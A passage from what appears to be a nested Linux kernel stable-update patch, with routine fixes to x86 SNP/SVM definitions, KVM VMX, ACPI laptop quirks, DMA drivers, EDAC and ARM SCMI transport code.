++#define MSR_AMD64_SNP_IBS_VIRT			BIT_ULL(14)
++#define MSR_AMD64_SNP_VMSA_REG_PROTECTION	BIT_ULL(16)
++#define MSR_AMD64_SNP_SMT_PROTECTION		BIT_ULL(17)
++
++/* SNP feature bits reserved for future use. */
++#define MSR_AMD64_SNP_RESERVED_BIT13		BIT_ULL(13)
++#define MSR_AMD64_SNP_RESERVED_BIT15		BIT_ULL(15)
++#define MSR_AMD64_SNP_RESERVED_MASK		GENMASK_ULL(63, 18)
++
+ #define MSR_AMD64_VIRT_SPEC_CTRL	0xc001011f
+ 
+ /* AMD Collaborative Processor Performance Control MSRs */
+diff --git a/arch/x86/include/uapi/asm/svm.h b/arch/x86/include/uapi/asm/svm.h
+index f69c168391aa5..80e1df482337d 100644
+--- a/arch/x86/include/uapi/asm/svm.h
++++ b/arch/x86/include/uapi/asm/svm.h
+@@ -116,6 +116,12 @@
+ #define SVM_VMGEXIT_AP_CREATE			1
+ #define SVM_VMGEXIT_AP_DESTROY			2
+ #define SVM_VMGEXIT_HV_FEATURES			0x8000fffd
++#define SVM_VMGEXIT_TERM_REQUEST		0x8000fffe
++#define SVM_VMGEXIT_TERM_REASON(reason_set, reason_code)	\
++	/* SW_EXITINFO1[3:0] */					\
++	(((((u64)reason_set) & 0xf)) |				\
++	/* SW_EXITINFO1[11:4] */				\
++	((((u64)reason_code) & 0xff) << 4))
+ #define SVM_VMGEXIT_UNSUPPORTED_EVENT		0x8000ffff
+ 
+ /* Exit code reserved for hypervisor/software use */
+diff --git a/arch/x86/kernel/i8259.c b/arch/x86/kernel/i8259.c
+index 15aefa3f3e18e..f91e5e31aa4f0 100644
+--- a/arch/x86/kernel/i8259.c
++++ b/arch/x86/kernel/i8259.c
+@@ -114,6 +114,7 @@ static void make_8259A_irq(unsigned int irq)
+ 	disable_irq_nosync(irq);
+ 	io_apic_irqs &= ~(1<<irq);
+ 	irq_set_chip_and_handler(irq, &i8259A_chip, handle_level_irq);
++	irq_set_status_flags(irq, IRQ_LEVEL);
+ 	enable_irq(irq);
+ 	lapic_assign_legacy_vector(irq, true);
+ }
+diff --git a/arch/x86/kernel/irqinit.c b/arch/x86/kernel/irqinit.c
+index beb1bada1b0ab..c683666876f1c 100644
+--- a/arch/x86/kernel/irqinit.c
++++ b/arch/x86/kernel/irqinit.c
+@@ -65,8 +65,10 @@ void __init init_ISA_irqs(void)
+ 
+ 	legacy_pic->init(0);
+ 
+-	for (i = 0; i < nr_legacy_irqs(); i++)
++	for (i = 0; i < nr_legacy_irqs(); i++) {
+ 		irq_set_chip_and_handler(i, chip, handle_level_irq);
++		irq_set_status_flags(i, IRQ_LEVEL);
++	}
+ }
+ 
+ void __init init_IRQ(void)
+diff --git a/arch/x86/kvm/vmx/vmx.c b/arch/x86/kvm/vmx/vmx.c
+index 63247c57c72cc..4ae248e87f5ed 100644
+--- a/arch/x86/kvm/vmx/vmx.c
++++ b/arch/x86/kvm/vmx/vmx.c
+@@ -3412,18 +3412,15 @@ static u32 vmx_segment_access_rights(struct kvm_segment *var)
+ {
+ 	u32 ar;
+ 
+-	if (var->unusable || !var->present)
+-		ar = 1 << 16;
+-	else {
+-		ar = var->type & 15;
+-		ar |= (var->s & 1) << 4;
+-		ar |= (var->dpl & 3) << 5;
+-		ar |= (var->present & 1) << 7;
+-		ar |= (var->avl & 1) << 12;
+-		ar |= (var->l & 1) << 13;
+-		ar |= (var->db & 1) << 14;
+-		ar |= (var->g & 1) << 15;
+-	}
++	ar = var->type & 15;
++	ar |= (var->s & 1) << 4;
++	ar |= (var->dpl & 3) << 5;
++	ar |= (var->present & 1) << 7;
++	ar |= (var->avl & 1) << 12;
++	ar |= (var->l & 1) << 13;
++	ar |= (var->db & 1) << 14;
++	ar |= (var->g & 1) << 15;
++	ar |= (var->unusable || !var->present) << 16;
+ 
+ 	return ar;
+ }
+diff --git a/drivers/acpi/resource.c b/drivers/acpi/resource.c
+index 16dcd31d124fe..192d1784e409b 100644
+--- a/drivers/acpi/resource.c
++++ b/drivers/acpi/resource.c
+@@ -432,6 +432,13 @@ static const struct dmi_system_id asus_laptop[] = {
+ 			DMI_MATCH(DMI_BOARD_NAME, "S5602ZA"),
+ 		},
+ 	},
++	{
++		.ident = "Asus ExpertBook B2402CBA",
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "ASUSTeK COMPUTER INC."),
++			DMI_MATCH(DMI_BOARD_NAME, "B2402CBA"),
++		},
++	},
+ 	{
+ 		.ident = "Asus ExpertBook B2502",
+ 		.matches = {
+diff --git a/drivers/acpi/sleep.c b/drivers/acpi/sleep.c
+index 0b557c0d405ef..4ca6672512722 100644
+--- a/drivers/acpi/sleep.c
++++ b/drivers/acpi/sleep.c
+@@ -60,13 +60,17 @@ static struct notifier_block tts_notifier = {
+ 	.priority	= 0,
+ };
+ 
++#ifndef acpi_skip_set_wakeup_address
++#define acpi_skip_set_wakeup_address() false
++#endif
++
+ static int acpi_sleep_prepare(u32 acpi_state)
+ {
+ #ifdef CONFIG_ACPI_SLEEP
+ 	unsigned long acpi_wakeup_address;
+ 
+ 	/* do we have a wakeup address for S2 and S3? */
+-	if (acpi_state == ACPI_STATE_S3) {
++	if (acpi_state == ACPI_STATE_S3 && !acpi_skip_set_wakeup_address()) {
+ 		acpi_wakeup_address = acpi_get_wakeup_address();
+ 		if (!acpi_wakeup_address)
+ 			return -EFAULT;
+diff --git a/drivers/acpi/video_detect.c b/drivers/acpi/video_detect.c
+index 1db8e68cd8bce..5c32b318c173d 100644
+--- a/drivers/acpi/video_detect.c
++++ b/drivers/acpi/video_detect.c
+@@ -110,26 +110,6 @@ static bool nvidia_wmi_ec_supported(void)
+ }
+ #endif
+ 
+-static bool apple_gmux_backlight_present(void)
+-{
+-	struct acpi_device *adev;
+-	struct device *dev;
+-
+-	adev = acpi_dev_get_first_match_dev(GMUX_ACPI_HID, NULL, -1);
+-	if (!adev)
+-		return false;
+-
+-	dev = acpi_get_first_physical_node(adev);
+-	if (!dev)
+-		return false;
+-
+-	/*
+-	 * drivers/platform/x86/apple-gmux.c only supports old style
+-	 * Apple GMUX with an IO-resource.
+-	 */
+-	return pnp_get_resource(to_pnp_dev(dev), IORESOURCE_IO, 0) != NULL;
+-}
+-
+ /* Force to use vendor driver when the ACPI device is known to be
+  * buggy */
+ static int video_detect_force_vendor(const struct dmi_system_id *d)
+@@ -600,6 +580,14 @@ static const struct dmi_system_id video_detect_dmi_table[] = {
+ 		DMI_MATCH(DMI_PRODUCT_NAME, "GA503"),
+ 		},
+ 	},
++	{
++	 .callback = video_detect_force_native,
++	 /* Asus U46E */
++	 .matches = {
++		DMI_MATCH(DMI_SYS_VENDOR, "ASUSTeK Computer Inc."),
++		DMI_MATCH(DMI_PRODUCT_NAME, "U46E"),
++		},
++	},
+ 	{
+ 	 .callback = video_detect_force_native,
+ 	 /* Asus UX303UB */
+@@ -608,6 +596,23 @@ static const struct dmi_system_id video_detect_dmi_table[] = {
+ 		DMI_MATCH(DMI_PRODUCT_NAME, "UX303UB"),
+ 		},
+ 	},
++	{
++	 .callback = video_detect_force_native,
++	 /* HP EliteBook 8460p */
++	 .matches = {
++		DMI_MATCH(DMI_SYS_VENDOR, "Hewlett-Packard"),
++		DMI_MATCH(DMI_PRODUCT_NAME, "HP EliteBook 8460p"),
++		},
++	},
++	{
++	 .callback = video_detect_force_native,
++	 /* HP Pavilion g6-1d80nr / B4U19UA */
++	 .matches = {
++		DMI_MATCH(DMI_SYS_VENDOR, "Hewlett-Packard"),
++		DMI_MATCH(DMI_PRODUCT_NAME, "HP Pavilion g6 Notebook PC"),
++		DMI_MATCH(DMI_PRODUCT_SKU, "B4U19UA"),
++		},
++	},
+ 	{
+ 	 .callback = video_detect_force_native,
+ 	 /* Samsung N150P */
+@@ -756,6 +761,7 @@ static enum acpi_backlight_type __acpi_video_get_backlight_type(bool native)
+ {
+ 	static DEFINE_MUTEX(init_mutex);
+ 	static bool nvidia_wmi_ec_present;
++	static bool apple_gmux_present;
+ 	static bool native_available;
+ 	static bool init_done;
+ 	static long video_caps;
+@@ -769,6 +775,7 @@ static enum acpi_backlight_type __acpi_video_get_backlight_type(bool native)
+ 				    ACPI_UINT32_MAX, find_video, NULL,
+ 				    &video_caps, NULL);
+ 		nvidia_wmi_ec_present = nvidia_wmi_ec_supported();
++		apple_gmux_present = apple_gmux_detect(NULL, NULL);
+ 		init_done = true;
+ 	}
+ 	if (native)
+@@ -790,7 +797,7 @@ static enum acpi_backlight_type __acpi_video_get_backlight_type(bool native)
+ 	if (nvidia_wmi_ec_present)
+ 		return acpi_backlight_nvidia_wmi_ec;
+ 
+-	if (apple_gmux_backlight_present())
++	if (apple_gmux_present)
+ 		return acpi_backlight_apple_gmux;
+ 
+ 	/* Use ACPI video if available, except when native should be preferred. */
+diff --git a/drivers/ata/Kconfig b/drivers/ata/Kconfig
+index 36833a8629980..d9b305a3427f7 100644
+--- a/drivers/ata/Kconfig
++++ b/drivers/ata/Kconfig
+@@ -650,6 +650,7 @@ config PATA_CS5530
+ config PATA_CS5535
+ 	tristate "CS5535 PATA support (Experimental)"
+ 	depends on PCI && (X86_32 || (X86_64 && COMPILE_TEST))
++	depends on !UML
+ 	help
+ 	  This option enables support for the NatSemi/AMD CS5535
+ 	  companion chip used with the Geode processor family.
+diff --git a/drivers/base/property.c b/drivers/base/property.c
+index 2a5a37fcd9987..7f338cb4fb7b8 100644
+--- a/drivers/base/property.c
++++ b/drivers/base/property.c
+@@ -989,26 +989,32 @@ struct fwnode_handle *
+ fwnode_graph_get_next_endpoint(const struct fwnode_handle *fwnode,
+ 			       struct fwnode_handle *prev)
+ {
++	struct fwnode_handle *ep, *port_parent = NULL;
+ 	const struct fwnode_handle *parent;
+-	struct fwnode_handle *ep;
+ 
+ 	/*
+ 	 * If this function is in a loop and the previous iteration returned
+ 	 * an endpoint from fwnode->secondary, then we need to use the secondary
+ 	 * as parent rather than @fwnode.
+ 	 */
+-	if (prev)
+-		parent = fwnode_graph_get_port_parent(prev);
+-	else
++	if (prev) {
++		port_parent = fwnode_graph_get_port_parent(prev);
++		parent = port_parent;
++	} else {
+ 		parent = fwnode;
++	}
+ 	if (IS_ERR_OR_NULL(parent))
+ 		return NULL;
+ 
+ 	ep = fwnode_call_ptr_op(parent, graph_get_next_endpoint, prev);
+ 	if (ep)
+-		return ep;
++		goto out_put_port_parent;
++
++	ep = fwnode_graph_get_next_endpoint(parent->secondary, NULL);
+ 
+-	return fwnode_graph_get_next_endpoint(parent->secondary, NULL);
++out_put_port_parent:
++	fwnode_handle_put(port_parent);
++	return ep;
+ }
+ EXPORT_SYMBOL_GPL(fwnode_graph_get_next_endpoint);
+ 
+diff --git a/drivers/base/test/test_async_driver_probe.c b/drivers/base/test/test_async_driver_probe.c
+index 4d1976ca50727..929410d0dd6fe 100644
+--- a/drivers/base/test/test_async_driver_probe.c
++++ b/drivers/base/test/test_async_driver_probe.c
+@@ -145,7 +145,7 @@ static int __init test_async_probe_init(void)
+ 	calltime = ktime_get();
+ 	for_each_online_cpu(cpu) {
+ 		nid = cpu_to_node(cpu);
+-		pdev = &sync_dev[sync_id];
++		pdev = &async_dev[async_id];
+ 
+ 		*pdev = test_platform_device_register_node("test_async_driver",
+ 							   async_id,
+diff --git a/drivers/block/rnbd/rnbd-clt.c b/drivers/block/rnbd/rnbd-clt.c
+index 78334da74d8bf..5eb8c7855970d 100644
+--- a/drivers/block/rnbd/rnbd-clt.c
++++ b/drivers/block/rnbd/rnbd-clt.c
+@@ -1440,7 +1440,7 @@ static struct rnbd_clt_dev *init_dev(struct rnbd_clt_session *sess,
+ 		goto out_alloc;
+ 	}
+ 
+-	ret = ida_alloc_max(&index_ida, 1 << (MINORBITS - RNBD_PART_BITS),
++	ret = ida_alloc_max(&index_ida, (1 << (MINORBITS - RNBD_PART_BITS)) - 1,
+ 			    GFP_KERNEL);
+ 	if (ret < 0) {
+ 		pr_err("Failed to initialize device '%s' from session %s, allocating idr failed, err: %d\n",
+diff --git a/drivers/block/ublk_drv.c b/drivers/block/ublk_drv.c
+index 17b677b5d3b22..e546932046309 100644
+--- a/drivers/block/ublk_drv.c
++++ b/drivers/block/ublk_drv.c
+@@ -2092,13 +2092,12 @@ static void __exit ublk_exit(void)
+ 	struct ublk_device *ub;
+ 	int id;
+ 
+-	class_destroy(ublk_chr_class);
+-
+-	misc_deregister(&ublk_misc);
+-
+ 	idr_for_each_entry(&ublk_index_idr, ub, id)
+ 		ublk_remove(ub);
+ 
++	class_destroy(ublk_chr_class);
++	misc_deregister(&ublk_misc);
++
+ 	idr_destroy(&ublk_index_idr);
+ 	unregister_chrdev_region(ublk_chr_devt, UBLK_MINORS);
+ }
+diff --git a/drivers/cpufreq/armada-37xx-cpufreq.c b/drivers/cpufreq/armada-37xx-cpufreq.c
+index c10fc33b29b18..b74289a95a171 100644
+--- a/drivers/cpufreq/armada-37xx-cpufreq.c
++++ b/drivers/cpufreq/armada-37xx-cpufreq.c
+@@ -445,7 +445,7 @@ static int __init armada37xx_cpufreq_driver_init(void)
+ 		return -ENODEV;
+ 	}
+ 
+-	clk = clk_get(cpu_dev, 0);
++	clk = clk_get(cpu_dev, NULL);
+ 	if (IS_ERR(clk)) {
+ 		dev_err(cpu_dev, "Cannot get clock for CPU0\n");
+ 		return PTR_ERR(clk);
+diff --git a/drivers/cpufreq/cppc_cpufreq.c b/drivers/cpufreq/cppc_cpufreq.c
+index 432dfb4e8027e..022e3555407c8 100644
+--- a/drivers/cpufreq/cppc_cpufreq.c
++++ b/drivers/cpufreq/cppc_cpufreq.c
+@@ -487,7 +487,8 @@ static unsigned int get_perf_level_count(struct cpufreq_policy *policy)
+ 	cpu_data = policy->driver_data;
+ 	perf_caps = &cpu_data->perf_caps;
+ 	max_cap = arch_scale_cpu_capacity(cpu);
+-	min_cap = div_u64(max_cap * perf_caps->lowest_perf, perf_caps->highest_perf);
++	min_cap = div_u64((u64)max_cap * perf_caps->lowest_perf,
++			  perf_caps->highest_perf);
+ 	if ((min_cap == 0) || (max_cap < min_cap))
+ 		return 0;
+ 	return 1 + max_cap / CPPC_EM_CAP_STEP - min_cap / CPPC_EM_CAP_STEP;
+@@ -519,10 +520,10 @@ static int cppc_get_cpu_power(struct device *cpu_dev,
+ 	cpu_data = policy->driver_data;
+ 	perf_caps = &cpu_data->perf_caps;
+ 	max_cap = arch_scale_cpu_capacity(cpu_dev->id);
+-	min_cap = div_u64(max_cap * perf_caps->lowest_perf,
+-			perf_caps->highest_perf);
+-
+-	perf_step = CPPC_EM_CAP_STEP * perf_caps->highest_perf / max_cap;
++	min_cap = div_u64((u64)max_cap * perf_caps->lowest_perf,
++			  perf_caps->highest_perf);
++	perf_step = div_u64((u64)CPPC_EM_CAP_STEP * perf_caps->highest_perf,
++			    max_cap);
+ 	min_step = min_cap / CPPC_EM_CAP_STEP;
+ 	max_step = max_cap / CPPC_EM_CAP_STEP;
+ 
+diff --git a/drivers/cpufreq/cpufreq-dt-platdev.c b/drivers/cpufreq/cpufreq-dt-platdev.c
+index 6ac3800db4508..69a8742c0a7a3 100644
+--- a/drivers/cpufreq/cpufreq-dt-platdev.c
++++ b/drivers/cpufreq/cpufreq-dt-platdev.c
+@@ -135,6 +135,7 @@ static const struct of_device_id blocklist[] __initconst = {
+ 	{ .compatible = "nvidia,tegra30", },
+ 	{ .compatible = "nvidia,tegra124", },
+ 	{ .compatible = "nvidia,tegra210", },
++	{ .compatible = "nvidia,tegra234", },
+ 
+ 	{ .compatible = "qcom,apq8096", },
+ 	{ .compatible = "qcom,msm8996", },
+@@ -148,6 +149,7 @@ static const struct of_device_id blocklist[] __initconst = {
+ 	{ .compatible = "qcom,sdm845", },
+ 	{ .compatible = "qcom,sm6115", },
+ 	{ .compatible = "qcom,sm6350", },
++	{ .compatible = "qcom,sm6375", },
+ 	{ .compatible = "qcom,sm8150", },
+ 	{ .compatible = "qcom,sm8250", },
+ 	{ .compatible = "qcom,sm8350", },
+diff --git a/drivers/dma/dmaengine.c b/drivers/dma/dmaengine.c
+index c741b6431958c..8a6e6b60d66f3 100644
+--- a/drivers/dma/dmaengine.c
++++ b/drivers/dma/dmaengine.c
+@@ -451,7 +451,8 @@ static int dma_chan_get(struct dma_chan *chan)
+ 	/* The channel is already in use, update client count */
+ 	if (chan->client_count) {
+ 		__module_get(owner);
+-		goto out;
++		chan->client_count++;
++		return 0;
+ 	}
+ 
+ 	if (!try_module_get(owner))
+@@ -470,11 +471,11 @@ static int dma_chan_get(struct dma_chan *chan)
+ 			goto err_out;
+ 	}
+ 
++	chan->client_count++;
++
+ 	if (!dma_has_cap(DMA_PRIVATE, chan->device->cap_mask))
+ 		balance_ref_count(chan);
+ 
+-out:
+-	chan->client_count++;
+ 	return 0;
+ 
+ err_out:
+diff --git a/drivers/dma/ptdma/ptdma-dev.c b/drivers/dma/ptdma/ptdma-dev.c
+index 377da23012ac2..a2bf13ff18b6d 100644
+--- a/drivers/dma/ptdma/ptdma-dev.c
++++ b/drivers/dma/ptdma/ptdma-dev.c
+@@ -71,12 +71,13 @@ static int pt_core_execute_cmd(struct ptdma_desc *desc, struct pt_cmd_queue *cmd
+ 	bool soc = FIELD_GET(DWORD0_SOC, desc->dw0);
+ 	u8 *q_desc = (u8 *)&cmd_q->qbase[cmd_q->qidx];
+ 	u32 tail;
++	unsigned long flags;
+ 
+ 	if (soc) {
+ 		desc->dw0 |= FIELD_PREP(DWORD0_IOC, desc->dw0);
+ 		desc->dw0 &= ~DWORD0_SOC;
+ 	}
+-	mutex_lock(&cmd_q->q_mutex);
++	spin_lock_irqsave(&cmd_q->q_lock, flags);
+ 
+ 	/* Copy 32-byte command descriptor to hw queue. */
+ 	memcpy(q_desc, desc, 32);
+@@ -91,7 +92,7 @@ static int pt_core_execute_cmd(struct ptdma_desc *desc, struct pt_cmd_queue *cmd
+ 
+ 	/* Turn the queue back on using our cached control register */
+ 	pt_start_queue(cmd_q);
+-	mutex_unlock(&cmd_q->q_mutex);
++	spin_unlock_irqrestore(&cmd_q->q_lock, flags);
+ 
+ 	return 0;
+ }
+@@ -199,7 +200,7 @@ int pt_core_init(struct pt_device *pt)
+ 
+ 	cmd_q->pt = pt;
+ 	cmd_q->dma_pool = dma_pool;
+-	mutex_init(&cmd_q->q_mutex);
++	spin_lock_init(&cmd_q->q_lock);
+ 
+ 	/* Page alignment satisfies our needs for N <= 128 */
+ 	cmd_q->qsize = Q_SIZE(Q_DESC_SIZE);
+diff --git a/drivers/dma/ptdma/ptdma.h b/drivers/dma/ptdma/ptdma.h
+index d093c43b7d134..21b4bf895200b 100644
+--- a/drivers/dma/ptdma/ptdma.h
++++ b/drivers/dma/ptdma/ptdma.h
+@@ -196,7 +196,7 @@ struct pt_cmd_queue {
+ 	struct ptdma_desc *qbase;
+ 
+ 	/* Aligned queue start address (per requirement) */
+-	struct mutex q_mutex ____cacheline_aligned;
++	spinlock_t q_lock ____cacheline_aligned;
+ 	unsigned int qidx;
+ 
+ 	unsigned int qsize;
+diff --git a/drivers/dma/qcom/gpi.c b/drivers/dma/qcom/gpi.c
+index 3f56514bbef8f..98d45ee4b4e34 100644
+--- a/drivers/dma/qcom/gpi.c
++++ b/drivers/dma/qcom/gpi.c
+@@ -1756,6 +1756,7 @@ static int gpi_create_spi_tre(struct gchan *chan, struct gpi_desc *desc,
+ 		tre->dword[3] = u32_encode_bits(TRE_TYPE_GO, TRE_FLAGS_TYPE);
+ 		if (spi->cmd == SPI_RX) {
+ 			tre->dword[3] |= u32_encode_bits(1, TRE_FLAGS_IEOB);
++			tre->dword[3] |= u32_encode_bits(1, TRE_FLAGS_LINK);
+ 		} else if (spi->cmd == SPI_TX) {
+ 			tre->dword[3] |= u32_encode_bits(1, TRE_FLAGS_CHAIN);
+ 		} else { /* SPI_DUPLEX */
+diff --git a/drivers/dma/tegra186-gpc-dma.c b/drivers/dma/tegra186-gpc-dma.c
+index fa9bda4a2bc6f..75af3488a3baf 100644
+--- a/drivers/dma/tegra186-gpc-dma.c
++++ b/drivers/dma/tegra186-gpc-dma.c
+@@ -707,6 +707,7 @@ static int tegra_dma_terminate_all(struct dma_chan *dc)
+ 			return err;
+ 		}
+ 
++		vchan_terminate_vdesc(&tdc->dma_desc->vd);
+ 		tegra_dma_disable(tdc);
+ 		tdc->dma_desc = NULL;
+ 	}
+diff --git a/drivers/dma/ti/k3-udma.c b/drivers/dma/ti/k3-udma.c
+index 7b5081989b3d6..b86b809eb1f7e 100644
+--- a/drivers/dma/ti/k3-udma.c
++++ b/drivers/dma/ti/k3-udma.c
+@@ -761,11 +761,12 @@ static void udma_decrement_byte_counters(struct udma_chan *uc, u32 val)
+ 	if (uc->desc->dir == DMA_DEV_TO_MEM) {
+ 		udma_rchanrt_write(uc, UDMA_CHAN_RT_BCNT_REG, val);
+ 		udma_rchanrt_write(uc, UDMA_CHAN_RT_SBCNT_REG, val);
+-		udma_rchanrt_write(uc, UDMA_CHAN_RT_PEER_BCNT_REG, val);
++		if (uc->config.ep_type != PSIL_EP_NATIVE)
++			udma_rchanrt_write(uc, UDMA_CHAN_RT_PEER_BCNT_REG, val);
+ 	} else {
+ 		udma_tchanrt_write(uc, UDMA_CHAN_RT_BCNT_REG, val);
+ 		udma_tchanrt_write(uc, UDMA_CHAN_RT_SBCNT_REG, val);
+-		if (!uc->bchan)
++		if (!uc->bchan && uc->config.ep_type != PSIL_EP_NATIVE)
+ 			udma_tchanrt_write(uc, UDMA_CHAN_RT_PEER_BCNT_REG, val);
+ 	}
+ }
+diff --git a/drivers/dma/xilinx/xilinx_dma.c b/drivers/dma/xilinx/xilinx_dma.c
+index 8cd4e69dc7b4c..7660175704883 100644
+--- a/drivers/dma/xilinx/xilinx_dma.c
++++ b/drivers/dma/xilinx/xilinx_dma.c
+@@ -3141,8 +3141,10 @@ static int xilinx_dma_probe(struct platform_device *pdev)
+ 	/* Initialize the channels */
+ 	for_each_child_of_node(node, child) {
+ 		err = xilinx_dma_child_probe(xdev, child);
+-		if (err < 0)
++		if (err < 0) {
++			of_node_put(child);
+ 			goto error;
++		}
+ 	}
+ 
+ 	if (xdev->dma_config->dmatype == XDMA_TYPE_VDMA) {
+diff --git a/drivers/edac/edac_device.c b/drivers/edac/edac_device.c
+index 878deb4880cdb..0689e15107213 100644
+--- a/drivers/edac/edac_device.c
++++ b/drivers/edac/edac_device.c
+@@ -34,6 +34,9 @@
+ static DEFINE_MUTEX(device_ctls_mutex);
+ static LIST_HEAD(edac_device_list);
+ 
++/* Default workqueue processing interval on this instance, in msecs */
++#define DEFAULT_POLL_INTERVAL 1000
++
+ #ifdef CONFIG_EDAC_DEBUG
+ static void edac_device_dump_device(struct edac_device_ctl_info *edac_dev)
+ {
+@@ -336,7 +339,7 @@ static void edac_device_workq_function(struct work_struct *work_req)
+ 	 * whole one second to save timers firing all over the period
+ 	 * between integral seconds
+ 	 */
+-	if (edac_dev->poll_msec == 1000)
++	if (edac_dev->poll_msec == DEFAULT_POLL_INTERVAL)
+ 		edac_queue_work(&edac_dev->work, round_jiffies_relative(edac_dev->delay));
+ 	else
+ 		edac_queue_work(&edac_dev->work, edac_dev->delay);
+@@ -366,7 +369,7 @@ static void edac_device_workq_setup(struct edac_device_ctl_info *edac_dev,
+ 	 * timers firing on sub-second basis, while they are happy
+ 	 * to fire together on the 1 second exactly
+ 	 */
+-	if (edac_dev->poll_msec == 1000)
++	if (edac_dev->poll_msec == DEFAULT_POLL_INTERVAL)
+ 		edac_queue_work(&edac_dev->work, round_jiffies_relative(edac_dev->delay));
+ 	else
+ 		edac_queue_work(&edac_dev->work, edac_dev->delay);
+@@ -400,7 +403,7 @@ void edac_device_reset_delay_period(struct edac_device_ctl_info *edac_dev,
+ 	edac_dev->delay	    = msecs_to_jiffies(msec);
+ 
+ 	/* See comment in edac_device_workq_setup() above */
+-	if (edac_dev->poll_msec == 1000)
++	if (edac_dev->poll_msec == DEFAULT_POLL_INTERVAL)
+ 		edac_mod_work(&edac_dev->work, round_jiffies_relative(edac_dev->delay));
+ 	else
+ 		edac_mod_work(&edac_dev->work, edac_dev->delay);
+@@ -442,11 +445,7 @@ int edac_device_add_device(struct edac_device_ctl_info *edac_dev)
+ 		/* This instance is NOW RUNNING */
+ 		edac_dev->op_state = OP_RUNNING_POLL;
+ 
+-		/*
+-		 * enable workq processing on this instance,
+-		 * default = 1000 msec
+-		 */
+-		edac_device_workq_setup(edac_dev, 1000);
++		edac_device_workq_setup(edac_dev, edac_dev->poll_msec ?: DEFAULT_POLL_INTERVAL);
+ 	} else {
+ 		edac_dev->op_state = OP_RUNNING_INTERRUPT;
+ 	}
+diff --git a/drivers/edac/highbank_mc_edac.c b/drivers/edac/highbank_mc_edac.c
+index 61b76ec226af1..19fba258ae108 100644
+--- a/drivers/edac/highbank_mc_edac.c
++++ b/drivers/edac/highbank_mc_edac.c
+@@ -174,8 +174,10 @@ static int highbank_mc_probe(struct platform_device *pdev)
+ 	drvdata = mci->pvt_info;
+ 	platform_set_drvdata(pdev, mci);
+ 
+-	if (!devres_open_group(&pdev->dev, NULL, GFP_KERNEL))
+-		return -ENOMEM;
++	if (!devres_open_group(&pdev->dev, NULL, GFP_KERNEL)) {
++		res = -ENOMEM;
++		goto free;
++	}
+ 
+ 	r = platform_get_resource(pdev, IORESOURCE_MEM, 0);
+ 	if (!r) {
+@@ -243,6 +245,7 @@ err2:
+ 	edac_mc_del_mc(&pdev->dev);
+ err:
+ 	devres_release_group(&pdev->dev, NULL);
++free:
+ 	edac_mc_free(mci);
+ 	return res;
+ }
+diff --git a/drivers/edac/qcom_edac.c b/drivers/edac/qcom_edac.c
+index 97a27e42dd610..c45519f59dc11 100644
+--- a/drivers/edac/qcom_edac.c
++++ b/drivers/edac/qcom_edac.c
+@@ -252,7 +252,7 @@ clear:
+ static int
+ dump_syn_reg(struct edac_device_ctl_info *edev_ctl, int err_type, u32 bank)
+ {
+-	struct llcc_drv_data *drv = edev_ctl->pvt_info;
++	struct llcc_drv_data *drv = edev_ctl->dev->platform_data;
+ 	int ret;
+ 
+ 	ret = dump_syn_reg_values(drv, bank, err_type);
+@@ -289,7 +289,7 @@ static irqreturn_t
+ llcc_ecc_irq_handler(int irq, void *edev_ctl)
+ {
+ 	struct edac_device_ctl_info *edac_dev_ctl = edev_ctl;
+-	struct llcc_drv_data *drv = edac_dev_ctl->pvt_info;
++	struct llcc_drv_data *drv = edac_dev_ctl->dev->platform_data;
+ 	irqreturn_t irq_rc = IRQ_NONE;
+ 	u32 drp_error, trp_error, i;
+ 	int ret;
+@@ -358,7 +358,6 @@ static int qcom_llcc_edac_probe(struct platform_device *pdev)
+ 	edev_ctl->dev_name = dev_name(dev);
+ 	edev_ctl->ctl_name = "llcc";
+ 	edev_ctl->panic_on_ue = LLCC_ERP_PANIC_ON_UE;
+-	edev_ctl->pvt_info = llcc_driv_data;
+ 
+ 	rc = edac_device_add_device(edev_ctl);
+ 	if (rc)
+diff --git a/drivers/firmware/arm_scmi/shmem.c b/drivers/firmware/arm_scmi/shmem.c
+index 1dfe534b85184..87b4f4d35f062 100644
+--- a/drivers/firmware/arm_scmi/shmem.c
++++ b/drivers/firmware/arm_scmi/shmem.c
+@@ -81,10 +81,11 @@ u32 shmem_read_header(struct scmi_shared_mem __iomem *shmem)
+ void shmem_fetch_response(struct scmi_shared_mem __iomem *shmem,
+ 			  struct scmi_xfer *xfer)
+ {
++	size_t len = ioread32(&shmem->length);
++
+ 	xfer->hdr.status = ioread32(shmem->msg_payload);
+ 	/* Skip the length of header and status in shmem area i.e 8 bytes */
+-	xfer->rx.len = min_t(size_t, xfer->rx.len,
+-			     ioread32(&shmem->length) - 8);
++	xfer->rx.len = min_t(size_t, xfer->rx.len, len > 8 ? len - 8 : 0);
+ 
+ 	/* Take a copy to the rx buffer.. */
+ 	memcpy_fromio(xfer->rx.buf, shmem->msg_payload + 4, xfer->rx.len);
+@@ -93,8 +94,10 @@ void shmem_fetch_response(struct scmi_shared_mem __iomem *shmem,
+ void shmem_fetch_notification(struct scmi_shared_mem __iomem *shmem,
+ 			      size_t max_len, struct scmi_xfer *xfer)
+ {
++	size_t len = ioread32(&shmem->length);
++
+ 	/* Skip only the length of header in shmem area i.e 4 bytes */
+-	xfer->rx.len = min_t(size_t, max_len, ioread32(&shmem->length) - 4);
++	xfer->rx.len = min_t(size_t, max_len, len > 4 ? len - 4 : 0);
+ 
+ 	/* Take a copy to the rx buffer.. */
+ 	memcpy_fromio(xfer->rx.buf, shmem->msg_payload, xfer->rx.len);
+diff --git a/drivers/firmware/arm_scmi/virtio.c b/drivers/firmware/arm_scmi/virtio.c
+index 33c9b81a55cd1..1db975c088969 100644
+--- a/drivers/firmware/arm_scmi/virtio.c
++++ b/drivers/firmware/arm_scmi/virtio.c
+@@ -160,7 +160,6 @@ static void scmi_vio_channel_cleanup_sync(struct scmi_vio_channel *vioch)
+ 	}
+ 
+ 	vioch->shutdown_done = &vioch_shutdown_done;
+-	virtio_break_device(vioch->vqueue->vdev);
+ 	if (!vioch->is_rx && vioch->deferred_tx_wq)
+ 		/* Cannot be kicked anymore after this...*/
+ 		vioch->deferred_tx_wq = NULL;
+@@ -482,6 +481,12 @@ static int virtio_chan_free(int id, void *p, void *data)
+ 	struct scmi_chan_info *cinfo = p;
+ 	struct scmi_vio_channel *vioch = cinfo->transport_info;
+ 
++	/*
++	 * Break device to inhibit further traffic flowing while shutting down
++	 * the channels: doing it later holding vioch->lock creates unsafe
++	 * locking dependency chains as reported by LOCKDEP.
++	 */
++	virtio_break_device(vioch->vqueue->vdev);
+ 	scmi_vio_channel_cleanup_sync(vioch);
+ 
